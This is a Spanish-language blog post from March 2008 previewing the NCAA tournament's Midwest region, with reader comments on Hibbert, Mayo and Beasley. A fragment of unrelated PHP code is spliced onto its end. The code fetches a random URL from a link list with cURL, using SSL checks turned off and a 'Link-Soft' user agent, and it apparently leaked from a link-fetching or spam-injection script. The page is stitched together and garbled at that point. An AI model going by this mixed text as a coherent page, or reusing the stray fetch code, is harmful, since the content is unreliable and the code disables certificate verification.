Kansas, Georgetown, Wisconsin, Vanderbilt… muchos gallos para el mismo corral

18 de March de 2008 por RusticoColorao

Los Jayhawks de KansasSeguimos analizando el cuadro de la March Madness por la conferencia MIDWEST. Aunque los Jayhawks de Kansas (31-3) parten con el número 1, esta conferencia se presenta muy abierta, ya que Georgetown (27-5), Wisconsin (29-4) o Vanderbilt (26-7) disponen de equipos veteranos y acostumbrados a crecerse durante el torneo final. Es por ello que muy poca gente apuesta confiada por la Kansas de Darrell Arthur, Mario Chalmers o Brandon Rush, hecho en parte lógico si se tiene en cuenta que últimamente se quedan a las puertas aun cuando parten con la etiqueta de favoritos. Quizás este año rompan la maldición… o no.

Si Kansas no llega a la ronda final ¿quién puede hacerlo? Muchos especialistas creen que este año Georgetown llegará a la Final Four, dando un paso más con respecto al año pasado, en el que los Hibbert, Summers, Wallace y Green (ya en Seattle) doblaron las rodillas frente a la Ohio State de Oden y Conley en puertas del torneo final.

Georgetown con Hibbert a la cabeza

Pero más equipos presentan su candidatura en esta conferencia. Wisconsin, que acaba de ganar el título de la Big Ten con un bloque compacto y muy difícil de ganar, o Vanderbilt con Foster (alero que ha promediado 20 puntos y cerca del 50% en triples) y Ogilvy (pívot australiano freshman con una inteligencia extraordinaria) pueden ganar la conferencia sin que se pudiese catalogar como una sorpresa.

Pero todavía hay más: ¿podrá Clemson (24-9) continuar la línea que lleva y que casi pone contra las cuerdas a la todopoderosa North Carolina en la final de la conferencia ACC? ¿O alguien recuerda la hazaña de la modesta Davidson (26-6) con un maravilloso Stephen Curry (base que ha promediado 25 puntos y casi un 48% en triples) cuando casi elimina el año pasado en primera ronda a la consagrada Maryland?

Michael BeasleyY pienso yo: ya que estamos, ¿lanzamos un órdago? Eso es lo que apetece al ver ese enfrentamiento de primera ronda entre dos freshmen que lo tienen todo para convertirse en futuras estrellas de la NBA (al menos mediáticas lo son). Kansas State (20-11) con Beasley a la cabeza (26 puntos 12 rebotes) y USC (21-11) con OJ Mayo (con unos criticados 20 puntos y 40% en triples). Vaya expectación que está generando este partido.

Jugadores que conviene seguir:

Kansas State: Beasley… un 3-4 con una calidad abismal. El próximo número 1 del draft. ¿Será un 3 o un 4 en la NBA? Es la única duda que genera.

USC: OJ Mayo… venía precedido de una fama al nivel de LeBron, pero aunque no ha hecho una mala temporada en líneas generales eran tantas las expectativas que ha sabido a fracaso. Pero ¿y si gana el campeonato?

Otros: Bill Walker (Kansas State), Foster y Oglivy (Vanderbilt), Chalmers y Arthur (Kansas), Hibbert (Georgetown), Stephen Curry (Davidson)

Mi pronóstico…

Pues me encantaría que Mayo o Beasley llegasen lejos en el torneo, pero lo veo complicado y como no tengo favorito claro… me quedo con Vanderbilt, porque me encantan Foster y Oglivy.

Comenta

6 comentarios a esta entrada

  1. Dantley dice:
    #1

    Me gusta mucho Hibbert, pero se le ve muy blando

      Citar

  2. RusticoColorao dice:
    #2

    Hibbert hizo mal no presentándose el año pasado…iba para top 5 seguro. Este año en principio no entraría entre los primeros, pero claro, hay que tener en cuenta que él brilló el año pasado en el torneo final. Veremos pues.

      Citar

  3. MagicJohnson32 dice:
    #3

    ¿Crees que Mayo se pegará la hostia en la NBA?

      Citar

  4. RusticoColorao dice:
    #4

    Pues la verdad que le han llovido mucha críticas…no lo sé. Lo que es indudable es que tiene una calidad bestial…y qué mejor momento para demostrarla. Yo creo que triunfará (me la juego)

    Por cierto, según ha comentado hace poco se iba a quedar otro año en la universidad…Mika!!!!! jajajajaja

      Citar

  5. Jabho dice:
    #5

    Puestos a opinar a mi Mayo no me apasiona. Lo mejor es que por su fama oportunidades no le van a faltar pero para mi tiene mas talento que cabeza.

    Hibbert justo al reves. Tiene mas cabeza que talento. Creo que lo hará bien en la NBA aunque no será una estrella

      Citar

  6. txusma dice:
    #6

    El caso de Mayo me recuerda un poco al de Telfair q tb llego a la universidad como estrella absoluta creo recordar y despues fue cayendo en los mocks hasta ese puesto 13 final. De momento Mayo ya esta en el 7 y bajando mas aun despues de su eliminacion.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>